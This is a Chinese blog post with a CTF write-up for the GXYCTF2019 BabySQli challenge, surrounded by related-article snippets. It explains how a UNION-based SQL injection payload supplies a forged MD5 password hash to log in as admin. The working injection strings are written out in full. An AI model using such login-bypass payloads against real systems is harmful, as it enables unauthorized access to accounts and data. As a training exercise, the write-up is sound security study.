[GXYCTF2019]BabySQli

最新推荐文章于 2024-05-06 15:38:36 发布
最新推荐文章于 2024-05-06 15:38:36 发布
阅读量151 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yao_xin_de_yuan/article/details/108307776
版权

原题目描述:刚学完sqli,我才知道万能口令这么危险,还好我进行了防护,还用md5哈希了密码!
随便输入一个用户名admin和密码123,提示wrong pass!
输入name=aa&pw=123,提示wrong user!,说明用户名为admin
查看源代码发现一段编码:
在这里插入图片描述
经过base32+base64解码之后得到:

select * from user where username = '$name'

根据题目提示:sql注入+万能密码+md5(pw)
构造注入语句:

aa'union select 'admin','202cb962ac59075b964b07152d234b70'#&pw=123

发现列数不对,测试一下
aa'union select 1,2,3#&pw=123.时不报错了,结论:列数为3列。
测试一下admin的位置
aa'union select 1,’admin‘,3#&pw=123 时为,提示wrong pass!
最终的注入语句为

aa'union select 1,’admin‘,202cb962ac59075b964b07152d234b70‘#&pw=123

拿到flag

浪_zi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
精美网页模版,橙色政府网站建设
05-09
模板介绍: 风格清晰大气,结构规整,内置工作流,信息签收、信息签发、互动交流等常用政府网站功能,相对其他模板,此模板增加了网站常用一些参数统计和投稿统计,主要功能全部采用自定义模型,可以任意扩展字段和...
[GXYCTF2019]BabySQli1-BUUCTF
chinese_cabbage0的博客
02-05 847
主要是一个buuctf题目的解题过程,大家可以参考一下
[GXYCTF2019]BabySQli 1
最新发布
qq_44724114的博客
05-06 435
4. 用union联合注入,不知道是不是hackbar的问题,说我的sql语法有错,用bp抓包,修改就没问题(百思不得其解)。202cb962ac59075b964b07152d234b70这个是123通过MD5解密而来的数据。要注意 name=1’不能写成=admin’ 这样会查询到两个admin账户,要使只有我们现在查询的admin,只能union前面查询的数据没有显示才行。再一次进行base64解密,得到sql语句。进行一次base32解密。
C#做的超市管理系统。
11-17
《C#实现的超市管理系统详解》 在信息技术日益发达的今天,各类管理系统已经渗透到各行各业,其中超市管理系统作为零售业的重要组成部分,对于提升运营效率、优化库存管理具有重要作用。本系统采用C#编程语言和SQL ...
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2686
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
[原创]新型注入方式直击网络——session注入探究 邪恶八进制信息安全团队官方讨论组 努力为祖国的信息安全撑起一片蓝天 - EvilOctal Security Team - E_S_T.mht
08-22
[原创]新型注入方式直击网络——session注入探究 邪恶八进制信息安全团队官方讨论组 努力为祖国的信息安全撑起一片蓝天 - EvilOctal Security Team - E_S_T.mht
[GXYCTF2019]BabysqliV3.0
qq_62046696的博客
01-12 614
这里的test是为了绕过if(preg_match("[^a-z0-9]", $this->Filename)),只能是纯字母或者纯数字。为什么需要上传两次呢这是因为,执行cmd的方法是在destruct,上传第二次,第一次的就会销毁然后就会执行第一次的结果。在析构方法中找到了,$this->Filename = $sandbox.$_SESSION['user'].$ext;我们需要满足这个认证是成功的,所以需要找到这个session['user']没有这个用户,所以感觉可以使用盲注,对账号进行盲注。
[PwnThyBytes 2019]Baby_SQL
Je3Z的博客
09-14 639
没啥思路,看网页源代码,有个zip,下载/source.zip得到源码 index.php <?php session_start(); foreach ($_SESSION as $key => $value): $_SESSION[$key] = filter($value); endforeach; foreach ($_GET as $key => $value): $_GET[$key] = filter($value); endforeach; foreach ($_POST
[GXYCTF2019]BabySQli1
qq_48932191的博客
01-25 384
第一次接触这种题,属实是摸不着头脑,因为正常思路目的是爆库在库里找到flag字段,这道题不是这么想的,而是把目标放在了绕过原有的密码成功登入。尝试报错注入时发现过滤了圆括号,网上搜索似乎也没找到能绕过使用圆括号的方法,那么按以往爆库爆表爆字段的方法似乎无法使用了。根据经验这里猜测第三列存放的是账号对应的密码,而从sql库中获取密码后就会与我们输入的pw作对比,如果相等则成功登入。在响应报文找到一段注释,解码后发现是这样的,数据库根据我们输入的用户名查找三列信息。
BUU实战笔记——[GXYCTF2019]BabySQli1
qq_51175992的博客
09-16 234
这题是很简单的SQL注入,考察的是基本功和对联合查询的理解这里有两点需要特别注意:1. 不管是CTF题目还是实际的挖洞一定要先把它的流程走一遍看它是怎么玩的,再考虑怎么攻击,前期的信息收集十分重要!2.数据库的密码一般是通过MD5加密处理的,在注入的时候需要特别注意。
BUUCTF之[GXYCTF2019]BabySQli
weixin_44632787的博客
10-03 2384
题目 这题看到这个页面,而且题目上说的。给人的感觉就是个SQL注入题。。。。 启动BurpSuite抓包看看 有两个可疑点: 一是报用户错误(wrong user!),通常如果有这种错误的时候要先爆破账号,得到正确的账号后再去爆破密码。 这里返回的绿色部分明显是加密后的数据 首先提取绿色部分的信息,经过排查发现可以先base32解密,再base64 原数据: MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3C

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值